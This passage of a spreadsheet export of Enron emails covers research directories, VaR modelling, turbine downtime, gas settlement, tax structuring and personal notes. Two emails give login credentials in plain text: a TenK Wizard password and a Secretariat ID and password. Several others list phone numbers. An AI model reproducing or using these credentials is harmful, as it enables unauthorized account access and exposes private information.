Anita DuPont/NA/Enron@ENRON, Youyi Feng/NA/Enron@Enron, V Charles _x000D_
Weldon/HOU/ECT@ECT, Praveen Mellacheruvu/HOU/EES@EES, Li Sun/NA/Enron@Enron, _x000D_
Stephen Bennett/NA/Enron@ENRON, Roman Zadorozhny/HOU/EES@EES, Lance _x000D_
Cunningham/NA/Enron@ENRON, Leann Walton/NA/Enron@ENRON, Shane _x000D_
Green/HOU/EES@EES, Seksan Kiatsupaibul/HOU/EES@EES, Kate Lucas/HOU/ECT@ECT, _x000D_
Nelson Neale/NA/Enron@Enron, Rabi De/NA/Enron@ENRON, Kenneth _x000D_
Parkhill/NA/Enron@ENRON, Jaesoo Lew/NA/Enron@ENRON, Jason _x000D_
Sokolov/HOU/ECT@ECT, Steve Bigalow/NA/Enron@Enron, Tom _x000D_
Barkley/NA/Enron@Enron, Rakesh Bharati/NA/Enron@Enron_x000D_
cc:  _x000D_
Subject: Research Directory_x000D_
_x000D_
Oops!  Forgot the attachment!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Shirley Crenshaw/HOU/ECT on 01/08/2001 _x000D_
11:01 AM ---------------------------_x000D_
_x000D_
_x000D_
Shirley Crenshaw_x000D_
01/08/2001 11:05 AM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT, Stinson Gibner/HOU/ECT@ECT, Pinnamaneni _x000D_
Krishnarao/HOU/ECT@ECT, Vasant Shanbhogue/HOU/ECT@ECT, Mike A _x000D_
Roberts/HOU/ECT@ECT, Joseph Hrgovcic/HOU/ECT@ECT, Tanya _x000D_
Tamarchenko/HOU/ECT@ECT, Zimin Lu/HOU/ECT@ECT, Martin Lin/HOU/ECT@ECT, _x000D_
Maureen Raymond/HOU/ECT@ECT, Osman Sezgen/HOU/EES@EES, Paulo _x000D_
Issler/HOU/ECT@ECT, Amitava Dhar/Corp/Enron@ENRON, Alex _x000D_
Huang/Corp/Enron@ENRON, Kevin Kindall/Corp/Enron@ENRON, Kevin G _x000D_
Moore/HOU/ECT@ECT, Clayton Vernon/Corp/Enron@ENRON, William _x000D_
Smith/Corp/Enron@ENRON, Jose Marquez/Corp/Enron@ENRON, Chonawee _x000D_
Supatgiat/Corp/Enron@Enron, Shalesh Ganjoo/HOU/ECT@ECT, Tom _x000D_
Halliburton/Corp/Enron@Enron, Elena Chilkina/Corp/Enron@Enron, Sevil _x000D_
Yaman/Corp/Enron@Enron, Sofya Tamarchenko/NA/Enron@Enron, Bob _x000D_
Lee/NA/Enron@Enron, Gwyn Koepke/NA/Enron@Enron, Hector Campos/HOU/ECT@ECT, _x000D_
Anita DuPont/NA/Enron@ENRON, Youyi Feng/NA/Enron@Enron, V Charles _x000D_
Weldon/HOU/ECT@ECT, Praveen Mellacheruvu/HOU/EES@EES, Li Sun/NA/Enron@Enron, _x000D_
Stephen Bennett/NA/Enron@ENRON, Roman Zadorozhny/HOU/EES@EES, Lance _x000D_
Cunningham/NA/Enron@ENRON, Leann Walton/NA/Enron@ENRON, Shane _x000D_
Green/HOU/EES@EES, Seksan Kiatsupaibul/HOU/EES@EES, Kate Lucas/HOU/ECT@ECT, _x000D_
Nelson Neale/NA/Enron@Enron, Rabi De/NA/Enron@ENRON, Kenneth _x000D_
Parkhill/NA/Enron@ENRON, Jaesoo Lew/NA/Enron@ENRON, Jason _x000D_
Sokolov/HOU/ECT@ECT, Steve Bigalow/NA/Enron@Enron, Tom _x000D_
Barkley/NA/Enron@Enron, Rakesh Bharati/NA/Enron@Enron_x000D_
cc:  _x000D_
Subject: Research Directory_x000D_
_x000D_
Hello everyone:_x000D_
_x000D_
Attached is an updated copy of the Research directory for your information._x000D_
_x000D_
If there are any changes, please let me know._x000D_
_x000D_
Thanks!_x000D_
_x000D_
Shirley_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 22 Jan 2002 21:06:06 -0800 (PST)</t>
  </si>
  <si>
    <t>I think I'm ok_x000D_
--------------------------_x000D_
Sent from my BlackBerry Wireless Handheld (www.BlackBerry.net)_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Lavorato, John &lt;John.Lavorato@ENRON.com&gt;_x000D_
To: Oxley, David &lt;David.Oxley@ENRON.com&gt;_x000D_
Sent: Tue Jan 22 20:52:33 2002_x000D_
Subject: _x000D_
_x000D_
What do ya need?</t>
  </si>
  <si>
    <t>Fri, 22 Dec 2000 09:58:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Suggestion: implementing VAR based on non-normal log-returns_x000D_
 simulations</t>
  </si>
  <si>
    <t xml:space="preserve">Tanya,_x000D_
_x000D_
I could not locate the file._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Tanya Tamarchenko_x000D_
12/07/2000 01:17 PM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT, Rabi De/NA/Enron@ENRON, Jaesoo _x000D_
Lew/NA/Enron@ENRON_x000D_
cc:  _x000D_
Subject: Re: Suggestion: implementing VAR based on non-normal log-returns _x000D_
simulations  _x000D_
_x000D_
Everybody, _x000D_
we were talking for a while about using non-normal distributions in the _x000D_
Monte-Carlo simulations in our VAR model._x000D_
I put together some suggestion regarding this. The text is under _x000D_
O:\_Dropbox\Tanya\non_normal_logs.doc_x000D_
_x000D_
Look through this 3 page document, and let me know what you think, please._x000D_
_x000D_
_x000D_
Tanya_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 27 Jun 2002 06:48:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mark.walker@enron.com'})</t>
  </si>
  <si>
    <t>Re: Total Down Time</t>
  </si>
  <si>
    <t xml:space="preserve">What definition of down time do you mean?   If the GEWE definition,  the time _x000D_
when the turbine is faulted off automatically or in a repair status, is used _x000D_
then yes your are correct.   If the customer definition, when the turbine _x000D_
can't produce power in good winds, then you are incorrect.   The turbine _x000D_
can't produce power during manual pause  mode or in transition between _x000D_
states.  During calm months, the turbine should  not frequently be in _x000D_
transition.   Manual pause should be uncommon as per management direction._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Jeff Duff_x000D_
06/27/2002 01:15 PM_x000D_
To: Mark V Walker/EWC/Enron@ENRON, Mark Fisher/EWC/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: Total Down Time_x000D_
_x000D_
As a verification of understanding;_x000D_
_x000D_
Total Down Time  = TO - (DT + RT +LOT + MT + EST + WOT)_x000D_
_x000D_
Where TO = Total possible survey time._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Jeff_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 7 Apr 1997 01:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Ed Segner's Staff meeting, in 50M Dining Room</t>
  </si>
  <si>
    <t>_x000D_
PGE meeting -- identify alternatives_x000D_
Tom Hagen @ CSW Shockley would be avail on thurs or Fri or Lay</t>
  </si>
  <si>
    <t>Thu, 1 Nov 2001 15:37:59 -0800 (PST)</t>
  </si>
  <si>
    <t>TRV Notification:  (NG - PROPT P/L - 11/01/2001)</t>
  </si>
  <si>
    <t>The report named: NG - PROPT P/L &lt;http://trv.corp.enron.com/linkFromExcel.asp?report_cd=11&amp;report_name=NG+-+PROPT+P/L&amp;category_cd=5&amp;category_name=FINANCIAL&amp;toc_hide=1&amp;sTV1=5&amp;TV1Exp=Y&amp;current_efct_date=11/01/2001&gt;, published as of 11/01/2001 is now available for viewing on the website.</t>
  </si>
  <si>
    <t>Fri, 8 Feb 2002 09:09:42 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'audrey.robertson@enron.com', 'steven.harris@enron.com'})</t>
  </si>
  <si>
    <t>Bullets 02-08-02</t>
  </si>
  <si>
    <t xml:space="preserve">Audrey,_x000D_
_x000D_
Here they are.  Thanks, Kim._x000D_
_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Fri, 20 Apr 2001 08:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>ICAP WG Conference Call</t>
  </si>
  <si>
    <t xml:space="preserve">jcox@nyiso.com writes to the NYISO_TECH_EXCHANGE Discussion List:_x000D_
_x000D_
ICAP Working Group - CONFERENCE CALL_x000D_
Wednesday, April 25, 2001_x000D_
Time:  9:30 AM - 11:00 AM_x000D_
_x000D_
Dial in Number:  334-264-8326_x000D_
Participant Code:  824914_x000D_
_x000D_
_x000D_
_x000D_
Judith E. Cox_x000D_
Administrative Clerk_x000D_
New York Independent System Operator_x000D_
518-356-6233_x000D_
jcox@nyiso.com_x000D_
</t>
  </si>
  <si>
    <t>Wed, 7 Mar 2001 00:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Tuesday's P/L</t>
  </si>
  <si>
    <t>Thank you.  Will you please show me the detail from yesterday's difference _x000D_
and today's difference?_x000D_
_x000D_
Mike</t>
  </si>
  <si>
    <t>Tue, 6 Jun 2000 10:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Meeting with Janet, Dave, Billy, Hodge, Lemmons  re: Duke L &amp; G_x000D_
   3314</t>
  </si>
  <si>
    <t>Meeting with Janet Dietrich, Dave Fairley, Billy Lemmons, Jeff Hodge  _x000D_
regarding Duke L &amp; G</t>
  </si>
  <si>
    <t>Mon, 22 Oct 2001 07:40:44 -0700 (PDT)</t>
  </si>
  <si>
    <t>Gobal Markets report is fine to send</t>
  </si>
  <si>
    <t>thanks_x000D_
_x000D_
Sara Shackleton_x000D_
Enron Wholesale Services_x000D_
1400 Smith Street, EB3801a_x000D_
Houston, TX  77002_x000D_
Ph:  (713) 853-5620_x000D_
Fax: (713) 646-3490</t>
  </si>
  <si>
    <t>Wed, 26 Apr 2000 08:01:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Brooks and Dunn</t>
  </si>
  <si>
    <t>I have 2 incredible tickets for the Brooks and Dunn concert on Friday. Do you _x000D_
want them?_x000D_
_x000D_
Chris</t>
  </si>
  <si>
    <t>Wed, 29 Nov 2000 03:48:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'chad_modad@enron.net'})</t>
  </si>
  <si>
    <t xml:space="preserve">Mr. Lay,_x000D_
_x000D_
Thank you in advance for taking time to meet with me._x000D_
_x000D_
I wanted to let you know in advance the topics I would like to discuss._x000D_
_x000D_
Now that I have been at EBS for a little over a year, I want to update you on _x000D_
my_x000D_
progress and experiences within EBS._x000D_
_x000D_
The other topic I would like to discuss with you is my pursuit of an MBA.  _x000D_
More_x000D_
specifically I wanted to gather some of your insight as to pros and cons of _x000D_
this_x000D_
pursuit and how having an MBA with a technical background positions me within_x000D_
Enron._x000D_
_x000D_
I would also like to talk to you about the outside business interest of mine_x000D_
that I mentioned the night of the RISE School fundraiser.  This interest_x000D_
fulfills my entrepreneurial desires and for that matter, I have been involved_x000D_
with this company for the last five years and am one of three principles._x000D_
_x000D_
_x000D_
Best regards,_x000D_
_x000D_
Chad Modad_x000D_
Software Engineer_x000D_
Enron Broadband Services_x000D_
Tel: 713-669-4070_x000D_
Cell: 713-516-2347_x000D_
</t>
  </si>
  <si>
    <t>Wed, 14 Nov 2001 15:33:38 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jay.smith@enron.com', 'michael.olsen@enron.com'})</t>
  </si>
  <si>
    <t>FW: Unify Gas Month end Close - November 2001</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Melethil, Anwar  _x000D_
Sent:	Wednesday, November 14, 2001 5:19 PM_x000D_
To:	Baxter, Bryce; Bussell l, Kathryn; Dawes, Cheryl; Dhont, Margaret; Ed Terry; Farmer, Daren J.; Greif, Donna; Hall, Bob M; Harwell, Melanie; Heal, Kevin; Howard Camp; Jacobs, Charles; Jaquet, Tammy; John Lopez; Kinsey, Lisa; Lakho, Shahnaz; Lamadrid, Victor; Machleit, Shirley; Mcclure, Mark; McFatridge, Thomas; Olinger, Kimberly S.; Palmer, B. Scott; Pinion, Richard; Reeves, Leslie; Smith, George F.; Staab, Theresa; Sullivan, Patti; Superty, Robert; Valderrama, Lisa; Wynne, Rita_x000D_
Cc:	Cuccia, Michael; Kaspereit, Michael; Laurel, Robert; Mallak, Mutaz; Martinez, Danny; Neal, Steve; Pena, Matt; Roberts, Steve; Smith, Regan M.; SQL_MAIL; Stokes, Darren; Ward, Bob; Warner, John; Zwiers, Jeff_x000D_
Subject:	RE: Unify Gas Month end Close - November 2001_x000D_
_x000D_
attached is the month end close document for Gas Settlements:_x000D_
_x000D_
 _x000D_
_x000D_
the first mass draft run is tomorrow, Nov 15 for ENA Sales/Supply at 7.00pm._x000D_
Michael Cuccia will be monitoring the mass drafts for this month end._x000D_
_x000D_
thanks,_x000D_
Anwar_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Melethil, Anwar  _x000D_
Sent:	Tuesday, November 13, 2001 3:01 PM_x000D_
To:	Baxter, Bryce; Hiatt, Wendy; Jaquet, Tammy; Lakho, Shahnaz; Mcclure, Mark; Pinion, Richard; Wynne, Rita_x000D_
Cc:	Cuccia, Michael; Laurel, Robert; Mallak, Mutaz; Martinez, Danny; Neal, Steve; Pena, Matt; Roberts, Steve; Smith, Regan M.; SQL_MAIL; Stokes, Darren; Ward, Bob; Warner, John; Zwiers, Jeff_x000D_
Subject:	Unify Gas Month end Close - November 2001_x000D_
_x000D_
Please review the attached 'month end close' document and let us know if you would like to make any changes._x000D_
_x000D_
 &lt;&lt; File: Month End Close -November.doc &gt;&gt; _x000D_
_x000D_
i will be sending out this document tomorrow to the other Business Leads who are not in this list._x000D_
_x000D_
thanks very much._x000D_
_x000D_
Cheers,_x000D_
Anwar_x000D_
</t>
  </si>
  <si>
    <t>Thu, 28 Sep 2000 03:37:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kay.mann@enron.com', 'richard.broussard@enron.com'})</t>
  </si>
  <si>
    <t>Westinghouse Contract</t>
  </si>
  <si>
    <t>Kay -_x000D_
_x000D_
I hate to put you through dental surgery, but are you available to help vet _x000D_
EE&amp;CC's numbers with Brian Barto and Gavin Gaul?  Before I complete _x000D_
negotiations with Westinghouse on LD's, I want to make sure the Yahoos' _x000D_
understanding of the contract is correct._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Mitch</t>
  </si>
  <si>
    <t>Mon, 16 Apr 2001 02:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/16/01; HourAhead hour: 10;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Start Date: 4/16/01; HourAhead hour: 10;  No ancillary schedules awarded.  _x000D_
Variances detected._x000D_
Variances detected in SC Trades schedule._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001041610.txt_x000D_
_x000D_
---- SC Trades Schedule ----_x000D_
+++ Hour 10 - bad data from ISO._x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: EPMI_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/16/01_x000D_
  TRADING_SC: PGAE_x000D_
  PNT_OF_INTRC: NP15_x000D_
  SCHED_TYPE: ENGY_x000D_
  PURCH_SALE: 2_x000D_
  DEAL_NO: 1_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 8 Jul 2001 11:50:33 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'support@tenkwizard.com'})</t>
  </si>
  <si>
    <t>Welcome</t>
  </si>
  <si>
    <t>_x000D_
Hello, Kevin_x000D_
   _x000D_
Your Password is :  aksarben_x000D_
Your User Id is:    khyatt@enron.com_x000D_
   _x000D_
To Login:_x000D_
Step 1: go to www.tenkwizard.com_x000D_
Step 2: In the Upper right-hand corner click login_x000D_
Step 3: At the Top Enter your Password and User id_x000D_
_x000D_
To change the password: login then click on the preferences Tab_x000D_
_x000D_
Thank you for taking the time to Register!_x000D_
You can now receive alerts, filing downloads_x000D_
If you have any questions please reply to this email._x000D_
_x000D_
-TenK Technology Team-</t>
  </si>
  <si>
    <t>Wed, 20 Oct 1999 08:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'brian.hendon@enron.com', 'eric.gillaspie@enron.com', 'ryan.f.ruppert@exxon.sprint.com'})</t>
  </si>
  <si>
    <t>FW: FW: Stress</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Gerald Nemec/HOU/ECT on 10/20/99 03:16 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
"Townsend, George" &lt;gtownsend@manorisd.net&gt; on 10/20/99 03:21:41 PM_x000D_
To: "'Paul Townsend'" &lt;ptown18094@aol.com&gt;, Gerald Nemec/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: FW: FW: Stress_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&gt; -----Original Message-----_x000D_
&gt; From: ross schonhoeft [SMTP:rschonhoeft@hotmail.com]_x000D_
&gt; Sent: Wednesday, October 20, 1999 2:57 PM_x000D_
&gt; To: Jennifer.Chapman@esc20.k12.tx.us; jharper@interconnect.net;_x000D_
&gt; gtownsend@manorisd.net_x000D_
&gt; Subject: Fwd: FW: Stress_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; &gt;From: "Schonhoeft, R" &lt;RSCHONHOEFT@burnet.txed.net&gt;_x000D_
&gt; &gt;To: rschonhoeft@hotmail.com_x000D_
&gt; &gt;Subject: FW: Stress_x000D_
&gt; &gt;Date: Wed, 20 Oct 1999 14:34:24 -0500_x000D_
&gt; &gt;MIME-Version: 1.0_x000D_
&gt; &gt;From RSCHONHOEFT@burnet.txed.net Wed Oct 20 12:54:16 1999_x000D_
&gt; &gt;Received: from [170.76.75.70] by hotmail.com (3.2) with ESMTP id_x000D_
&gt; &gt;MHotMailB9D7682A0011D82197F1AA4C4B46F7330; Wed Oct 20 12:51:22 1999_x000D_
&gt; &gt;Received: by mail.burnet.txed.net with Internet Mail Service_x000D_
&gt; (5.5.1960.3)id_x000D_
&gt; &gt;&lt;4VGW0218&gt;; Wed, 20 Oct 1999 14:34:24 -0500_x000D_
&gt; &gt;Message-ID: &lt;33377472E906D2119F2900A0C9CF9EC2387FF2@mail.burnet.txed.net&gt;_x000D_
&gt; &gt;X-Mailer: Internet Mail Service (5.5.1960.3)_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;-----Original Message-----_x000D_
&gt; &gt;From: Janice Clements [mailto:gram85@hotmail.com]_x000D_
&gt; &gt;Sent: Monday, October 18, 1999 6:31 PM_x000D_
&gt; &gt;To: scotton@burnet.txed.net_x000D_
&gt; &gt;Subject: Fwd: Stress_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;Sharon,_x000D_
&gt; &gt;I loved the "change" story!!_x000D_
&gt; &gt;This is pretty cute,too_x000D_
&gt; &gt;_x000D_
&gt; &gt;Love, Janice_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; &gt;From: "Cathy Moore" &lt;cathy@nts-online.net&gt;_x000D_
&gt; &gt; &gt;To: "Janice Clements" &lt;gram85@hotmail.com&gt;_x000D_
&gt; &gt; &gt;Subject: Stress_x000D_
&gt; &gt; &gt;Date: Wed, 13 Oct 1999 16:19:45 -0500_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;Mabel_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;And You think you have stress...._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_______________________________________________________x000D_
&gt; &gt;Get Your Private, Free Email at http://www.hotmail.com_x000D_
&gt; &gt;_x000D_
&gt;_x000D_
&gt; _______________________________________________________x000D_
&gt; Get Your Private, Free Email at http://www.hotmail.com &lt;&lt;stress.jpg&gt;&gt;_x000D_
_x000D_
 - stress.jpg_x000D_
</t>
  </si>
  <si>
    <t>Mon, 5 Mar 2001 04:40:15 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'john.dushinske@enron.com', 'sarabeth.smith@enron.com'})</t>
  </si>
  <si>
    <t>RE: EAMR Interconnect and Measurement Services</t>
  </si>
  <si>
    <t xml:space="preserve">The reason there is no tax grossup is that there is no cash up front in either case.    This can also be accomplished if NNG does the deal without cash up front from the customer.    _x000D_
_x000D_
Case A, can be done merely because it is a construction deal for the customer.    That can be done with or without an EAMR in the mix (except for the construction) and actually get us a benefit 	in a future rate case as whatever is left of the value at that point in time becomes rate based.    Case B on the other hand can be done by any one, including the pipe.   _x000D_
_x000D_
I don't think we intend to be owning facilities for the transportation/measurement of natural gas in EAMR or otherwise outside of the pipelines, unless someone presents and gets approved a business plan that would argue the return is better than owning the facilities inside the pipeline._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Smith, Sarabeth  _x000D_
Sent:	Friday, March 02, 2001 5:21 PM_x000D_
To:	Dushinske, John_x000D_
Cc:	Stage, Michael G.; Marye, David; Hawkins, Don; Hayslett, Rod; Geaccone, Tracy_x000D_
Subject:	RE: EAMR Interconnect and Measurement Services_x000D_
_x000D_
_x000D_
John,_x000D_
Rod may have been thinking of a different scenario than what I have been pursuing._x000D_
_x000D_
The scenario currently on the table has two possibilities:_x000D_
Case A:  EAMR engineers, procures and constructs (EPC) the interconnect and/or measurement facilities for the customer.  The customer then holds title to the facilities and EAMR operates the facilities for them under a long term contract.  When the contract is terminated, the facilities are conveyed to either EAMR or the pipeline at a much smaller value (current market value for the used facilities at that point in the future).  _x000D_
_x000D_
Case B:  EAMR does EPC, owns and operates the facilities and then contracts with the customer for a long term interconnect service fee (possibly in cents/MMBtu or a lump sum dollar amount monthly) to recover the capital with a good return and operating costs plus a margin._x000D_
_x000D_
Robert Guthrie of the Tax Department has indicated that he believes these mechanisms will work.  EAMR would not be required to add a tax gross up for the contribution in aid of construction (CAC) because neither of the deals are structured with a CAC.  EAMR would only have to pay income tax on the profit made on either Case A or Case B annually._x000D_
_x000D_
More work needs to be done to work through these scenarios to see if they are completely feasible.  Since Case B involves capital and is much more complex, I have been concentrating on Case A and saving B for the future.  _x000D_
_x000D_
Michelle Lokay has been working with Pogo Producing on a new interconnect to TW and we are using that interconnect as an example to see if there are expanded services that can be offered._x000D_
_x000D_
Talk to you soon._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Dushinske, John  _x000D_
Sent:	Friday, March 02, 2001 2:49 PM_x000D_
To:	Smith, Sarabeth_x000D_
Cc:	Stage, Michael G._x000D_
Subject:	RE: EAMR Interconnect and Measurement Services_x000D_
_x000D_
Sarabeth - Thanks for following up.  We had a meeting w/ ETS Financial Planning last week and I asked if we could have EAMR play a role and thus avoid requiring the customer to true up for income taxes.  Rod Hayslett advised that it would not work because EAMR would have to treat the contribution as a taxable revenue and would therefore be in the same position as NNG. _x000D_
_x000D_
Do you have a different read on this?_x000D_
_x000D_
Thanks.  John  _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Smith, Sarabeth  _x000D_
Sent:	Tuesday, February 27, 2001 2:38 PM_x000D_
To:	Dushinske, John; Hyatt, Kevin; Fawcett, Jeffery; Herber, Stephen_x000D_
Cc:	Stage, Michael G.; Scott, Susan_x000D_
Subject:	EAMR Interconnect and Measurement Services_x000D_
_x000D_
John, Kevin, Jeff, and Steve,_x000D_
After yesterday's Marketing Roundtable meeting, I have given further thought to the idea of interconnect services for customers that would bring lower costs by avoiding the contribution in aid of construction and possibly other markup fees that the pipelines are required to charge._x000D_
_x000D_
Attached is a strawman of how this might work.  _x000D_
_x000D_
 &lt;&lt; File: EAMR Interconnect Services.doc &gt;&gt; _x000D_
_x000D_
Please take a look at the document and "tear it apart."    The more vigorous your analysis the quicker we will know if this is a concept worth pursueing further._x000D_
Also, do any of you have a sample deal currently on the table that we could test this concept on?  _x000D_
_x000D_
Best regards,_x000D_
Sarabeth_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 17 Mar 2000 03:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t>MS150 Media Day</t>
  </si>
  <si>
    <t>You are invited to attend_x000D_
Isuzu MS150 Bike Tour_x000D_
Media Day_x000D_
_x000D_
Monday, March 20, 2000_x000D_
11:30 am - 1:00 pm_x000D_
Quebedeaux Park_x000D_
Adjacent to the Family Law Center_x000D_
1115 Congress @ San Jacinto in downtown Houston_x000D_
_x000D_
We need your help in spreading the word abou the Isuzu MS150.  Your story _x000D_
could go a long way in driving up attendance and generating pledges.  The MS _x000D_
Society is hosting the MS150 Media Day for journalists from Houston to Austin _x000D_
in order to encourage their coverage of this spectacular event.  The more _x000D_
people that know about the Bike Tour, the more that participate.....and _x000D_
ultimately the more funds that are raised to unravel the mysteries of _x000D_
multiple sclerosis.  We would like you on hand to share your story about why _x000D_
you are riding the MS150 or past experiences on the Tour.  All we ask is that _x000D_
you stop by Quebedeaux Park Monday, March 20, and if possible, wear your bike _x000D_
jersey.  It is a casual, outdoor event and lunch  will be provided.  We will _x000D_
also have training tips, cycling pros and veteran advice available - you _x000D_
can't lose!_x000D_
_x000D_
It will be a fun time for all and a great way to gear up for this year's _x000D_
event.</t>
  </si>
  <si>
    <t>Fri, 27 Oct 2000 02:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'richard.schneider@enron.com', 'mog.heu@enron.com', 'stephanie.goldman@enron.com', 'jean.mrha@enron.com', 'mariella.mahan@enron.com', 'carol.marshall@enron.com', 'kim.wilkie@enron.com', 'kelly.boots@enron.com', 'grace.kim@enron.com', 'christie.patrick@enron.com', 'cindy.olson@enron.com', 'jennifer.fraser@enron.com', 'sally.beck@enron.com', 'bryan.garrett@enron.com', 'sabina.rank@enron.com', 'elizabeth.shim@enron.com', 'michelle.cash@enron.com'})</t>
  </si>
  <si>
    <t>Wellesley Interviews - Revision</t>
  </si>
  <si>
    <t xml:space="preserve">Here is the event form.....Disregard the strategy labeled 100400._x000D_
_x000D_
_x000D_
_x000D_
Thanks, Geynille_x000D_
---------------------- Forwarded by Geynille Dillingham/HOU/ECT on 10/27/2000 _x000D_
09:32 AM ---------------------------_x000D_
_x000D_
_x000D_
Geynille Dillingham_x000D_
10/27/2000 09:35 AM_x000D_
To: Cindy Olson/Corp/Enron@ENRON, Jean Mrha/NA/Enron@Enron, Mariella _x000D_
Mahan/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Sally Beck/HOU/ECT@ECT, Michelle _x000D_
Cash/HOU/ECT@ECT, Christie Patrick/HOU/ECT@ECT, Carol Jean _x000D_
Marshall/HOU/ECT@ECT, Elizabeth Shim/Corp/Enron@ENRON, Kelly H _x000D_
Boots/HOU/ECT@ECT, Jennifer Fraser/HOU/ECT@ECT, Stephanie Goldman/Enron _x000D_
Communications@Enron Communications, Grace Kim/NA/Enron@Enron, Richard _x000D_
Schneider/Enron Communications@Enron Communications, Bryan Garrett/Enron _x000D_
Communications@Enron Communications, Kim Wilkie/ET&amp;S/Enron@ENRON, Mog _x000D_
Heu/NA/Enron@Enron, Sabina Rank/NA/Enron@Enron_x000D_
cc: Bobbie Power/Corp/Enron@ENRON, Melissa Jones/NA/Enron@ENRON, Isabel _x000D_
Romero/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Patti Thompson/HOU/ECT@ECT, _x000D_
Twanda Sweet/HOU/ECT@ECT, Mary Border/Corp/Enron@Enron, Jacqueline _x000D_
Coleman/NA/Enron@ENRON _x000D_
Subject: Wellesley Interviews - Revision_x000D_
_x000D_
Hello Team,_x000D_
_x000D_
There has been some revisions to the Reception and Interview dates.  Please _x000D_
look at the event form for the details._x000D_
_x000D_
_x000D_
_x000D_
I have attached the strategy also for your convenience._x000D_
_x000D_
Geynille_x000D_
</t>
  </si>
  <si>
    <t>Thu, 8 Mar 2001 06:09:18 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'taria.reed@enron.com'})</t>
  </si>
  <si>
    <t>Secretariat</t>
  </si>
  <si>
    <t>Hardie is not in today.  The Secretariat ID is "secretariat" and the password is "c0rpsec".  Please let me know if, for some reason, that does not work for you._x000D_
_x000D_
Taria Reed_x000D_
ext 31898_x000D_
_x000D_
The information contained in this email may be confidential and/or privileged.  This email is intended to be reviewed by the individual or organization named above.  If you are not the intended recipient, you are hereby notified that any review, dissemination or copying of this email or its attachments, if any, or the information contained herein is prohibited.  If you have received this email in error, please immediately notify the sender by return email and delete this email from your system.  Thank you.</t>
  </si>
  <si>
    <t>Fri, 16 Mar 2001 03:53:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">I'll have to send the notice separately._x000D_
_x000D_
John's number is 713 751-3254._x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 03/16/2001 11:53 _x000D_
AM ---------------------------_x000D_
From: Suzanne Adams@ECT on 01/17/2001 02:47 PM_x000D_
To: kwiemer@milbank.com, Kathleen Carnahan/NA/Enron@Enron, Kay _x000D_
Mann/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: E-Next Generation Docs_x000D_
_x000D_
Attached are the documents that you asked me to change the signature line:_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 15 Dec 2000 04:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Ben Macklowe's Birthday Party</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Hillary, hope you are well.  Unfortunately, I won't be able to make it _x000D_
tomorrow.  I just couldn't work out the schedule, but it was extremely _x000D_
